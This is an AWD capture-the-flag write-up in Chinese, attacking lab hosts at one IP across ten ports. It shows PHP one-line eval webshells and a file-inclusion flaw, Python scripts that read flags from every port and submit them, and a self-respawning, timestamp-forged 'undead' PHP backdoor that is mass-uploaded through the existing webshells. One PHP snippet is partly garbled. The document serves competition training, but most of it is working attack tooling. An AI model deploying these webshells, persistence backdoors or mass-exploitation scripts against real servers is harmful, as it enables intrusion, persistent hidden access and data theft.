题目环境:
靶机IP: 192.168.2.146
SSH端口: 2201-2210
Web端口: 8801-8810
flag提交地址: 192.168.2.146:8080
flag提交api: 192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag
D盾漏洞
漏洞1——.a.php
漏洞详情:
<?php @eval($_REQUEST['c']);
?>
可以看到是一句话木马。
漏洞利用:
list目录:192.168.2.146:8801/.a.php?c=system(ls);
cat flag:192.168.2.146:8801/.a.php?c=system(“cat /flag”);
批量获取flag + 提交flag 脚本:
# 192.168.2.146:8801/.a.php?c=system("cat /flag");
import requests
url1 = "http://192.168.2.146:"
url2 = '/.a.php'
for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
print(res.text)
flag_payload = { "token" : "team1" , "flag" : res.text}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)
漏洞2——a.php
漏洞详情:
<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>
漏洞利用:
和上一个差不多,但是比上一个.a.php
多了var_dump()
,因此在获得flag的时候,需要做正则匹配(也可以截取字符串= =、
批量获取flag并提交脚本:
# 192.168.2.146:8801/a.php?c=system("cat /flag");
import requests
url1 = "http://192.168.2.146:"
url2 = '/a.php'
for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
漏洞3——about.php
漏洞详情:
<?php
$file=$_GET['file'];
include $file;
?>
很显然是一个文件包含漏洞:
脚本如下:
# http://192.168.2.146:8801/about.php?file=/flag
import requests
url1 = "http://192.168.2.146:"
url2 = '/about.php'
for i in range(1 , 11):
payload = { "file" : '/flag'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
漏洞4——config.php
还是一句话木马
脚本如下:
# http://192.168.2.146:8801/config.php?c=system("cat /flag");
import requests
url1 = "http://192.168.2.146:"
url2 = '/config.php'
for i in range(1 , 11):
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
except:
continue
else:
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
利用一句话木马批量上传不死马
-
PHP版本不死马:
while (1){
file_put_contents(
f
i
l
e
,
file,
file,code);
system(‘touch -m -d “2018-12-01 09:10:12” .2.php’);
usleep(5000);
}
?>
```
-
在hackbar中上传不死马(假设有密码
c
为一句话木马的密码其中
stripslashes()
为反转义函数c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
-
由于批量上传不死马,需要用到Python,因此对上方的PHP不死马需要进行二次转义
file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
-
最终的python脚本
import time import requests url1 = "http://192.168.2.146:" url2 = "/.a.php" #这里的.a.php里有一句话木马 @eval($_REQUEST['c']); for i in range(1,11): print("*****************************") url = url1 + str(8800 + i) + url2 hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));" data = { "c" : hack } try: upload_res = requests.post(url , data=data) except: continue else: print("端口号为" + str(8800 + i) + "的机器不死马上传成功" ) requests_url = url1 + str(8800 + i) + "/bsm.php" # 访问不死马 try: requests_res = requests.get(requests_url , timeout = 5) except: time.sleep(6) #程序停止6秒用于生成不死马2.php print("-------开始访问不死马获取flag:") get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202" get_flag_data = { "coin" : "system(\"cat /flag\");" } get_flag_res = requests.post(get_flag_url , data=get_flag_data) print("端口号为"+str(8800+i)+"的机器flag为:"+get_flag_res.text[0:32]) flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]} submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload) print("flag提交成功!!!!!!!!!")